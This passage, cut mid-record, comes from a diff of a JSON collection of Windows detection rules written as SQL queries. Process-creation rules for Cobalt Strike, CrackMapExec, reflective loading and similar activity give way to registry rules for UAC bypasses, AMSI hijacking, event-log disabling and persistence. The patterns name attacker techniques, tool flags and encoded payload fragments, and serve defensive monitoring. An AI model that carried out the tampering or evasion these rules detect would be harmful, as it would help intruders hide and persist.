(Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft 